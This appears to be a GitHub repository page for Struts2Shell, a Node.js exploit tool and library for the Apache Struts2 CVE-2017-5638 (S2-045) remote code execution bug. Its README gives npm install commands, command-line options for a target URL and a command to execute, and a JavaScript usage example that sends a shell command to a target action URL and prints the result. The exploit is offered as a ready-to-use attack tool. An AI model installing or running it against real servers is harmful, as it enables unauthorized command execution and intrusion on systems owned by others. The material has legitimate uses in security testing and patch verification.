Struts2Shell

An exploit (and library) for CVE-2017-5638 - Apache Struts2 S2-045 bug.

Installation

$ npm install -g struts2shell

Installation as Library

$ npm install struts2shell

Command Line Options

-h, --help           output usage information
-V, --version        output the version number
-u, --url [target]   URL to Attack
-c, --cmd [command]  Command to Execute

Usage as Library

var Struts2Shell = require('struts2shell');
Struts2Shell({
	URL: 'http://example.com/some.action',
	CMD: 'dir'
}, function(err, response,body) {
    if(err) throw err;
    console.log(body)
})

Screenshot

License

MIT

Free Software, Hell Yeah!

Name		Name	Last commit message	Last commit date
Latest commit History 4 Commits
bin		bin
lib		lib
.gitignore		.gitignore
README.md		README.md
_config.yml		_config.yml
package.json		package.json
screenshot.png		screenshot.png

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

bin

bin

lib

lib

.gitignore

.gitignore

README.md

README.md

_config.yml

_config.yml

package.json

package.json

screenshot.png

screenshot.png

Repository files navigation

Struts2Shell

Installation

Installation as Library

Command Line Options

Usage as Library

Screenshot

License

About

Releases

Packages

Languages

ykankaya/Struts2Shell

Folders and files

Latest commit

History

Repository files navigation

Struts2Shell

Installation

Installation as Library

Command Line Options

Usage as Library

Screenshot

License

About

Resources

Stars

Watchers

Forks

Languages